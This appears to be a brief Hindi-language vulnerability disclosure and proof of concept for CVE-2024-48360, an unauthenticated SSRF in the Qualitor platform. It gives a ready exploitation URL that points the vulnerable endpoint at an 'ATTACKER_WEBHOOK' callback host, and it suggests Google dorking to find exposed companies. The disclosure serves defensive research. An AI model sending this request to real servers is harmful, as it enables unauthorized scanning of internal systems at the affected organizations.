
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 अप्रमाणित SSRF
Qualitor व्यवसाय प्रक्रिया प्रबंधन के लिए एक प्लेटफॉर्म है, और यह प्रणाली ब्राजील की विभिन्न कंपनियों में मौजूद है जिन्हें Google dorking का उपयोग करके आसानी से पहचाना जा सकता है।
हमारी टीम ने एप्लिकेशन में SSRF के प्रति संवेदनशील एक कमजोरी की पहचान की, जो आंतरिक सिस्टम/पोर्ट की गणना करने की अनुमति देती है।
Qualitor v8.24 में /request/viewValidacao.php घटक के माध्यम से सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) पाया गया।
शोषण करने के लिए, बस host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK पर एक अनुरोध भेजें, आपको कमजोर सर्वर से अनुरोध प्राप्त होगा।

https://www.linkedin.com/in/xvinicius/